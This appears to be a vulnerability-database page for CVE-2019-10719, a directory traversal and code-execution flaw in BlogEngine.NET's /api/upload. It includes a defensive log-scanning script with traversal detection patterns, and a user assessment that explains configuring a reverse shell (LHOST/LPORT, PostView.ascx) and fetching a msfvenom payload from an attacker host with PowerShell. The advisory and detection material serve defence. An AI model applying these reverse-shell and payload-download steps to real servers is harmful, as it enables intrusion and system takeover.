BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.
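For defenders, one way to look for attempts against this endpoint in IIS W3C logs, as an added example (not code from the advisory or from BlogEngine.NET). It assumes the traversal arrives in a `dirPath` query parameter (the name used in the advisory title linked on this page) and that the log records `cs-uri-stem` and `cs-uri-query`; the function names and log lines are constructed for illustration.

```python
from urllib.parse import parse_qsl, unquote

# Constructed IIS W3C log excerpt (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-02-06 16:01:10 192.0.2.10 POST /api/upload dirPath=%2Fimages 200
2021-02-06 16:02:44 198.51.100.7 POST /api/upload dirPath=%2F..%2F..%2Fplaceholder 200
2021-02-06 16:03:02 198.51.100.7 POST /API/Upload dirPath=%252e%252e%5Cplaceholder 200
2021-02-06 16:03:30 192.0.2.10 GET /api/posts take=5 200
"""

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(dir_path):
    """True if any path segment is '..', treating '\\' and '/' as separators."""
    return ".." in dir_path.replace("\\", "/").split("/")

def find_suspect_uploads(log_text):
    """Return (timestamp, client_ip, decoded dirPath) for /api/upload requests
    whose dirPath parameter (assumed name) contains a parent-directory segment."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS routes case-insensitively, so compare the stem in lower case.
        if row.get("cs-uri-stem", "").lower().rstrip("/") != "/api/upload":
            continue
        for key, value in parse_qsl(row.get("cs-uri-query", ""), keep_blank_values=True):
            if key.lower() == "dirpath" and has_traversal(fully_decode(value)):
                stamp = f"{row.get('date', '')} {row.get('time', '')}"
                hits.append((stamp, row.get("c-ip", ""), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_uploads(SAMPLE_LOG):
        print(*hit, sep="  ")
```

A hit only shows that a traversal-shaped request was logged; compare it with the response status and with files created on disk around the same time before treating it as a compromise.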
Recent assessments:
Leafry at February 06, 2021 4:28pm UTC reported:
This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.
Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others; this exploit creates a very unstable shell.
-The script should be named PostView.ascx
Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. -> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe
Assessed Attacker Value: 0
packetstormsecurity.com/files/153347/BlogEngine.NET-3.3.6-3.3.7-dirPath-Directory-Traversal-Remote-Code-Execution.html
seclists.org/fulldisclosure/2019/Jun/26
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10719
www.securitymetrics.com/blog/BlogEngineNET-Directory-Traversal-Remote-Code-Execution-CVE-2019-10719-CVE-2019-10720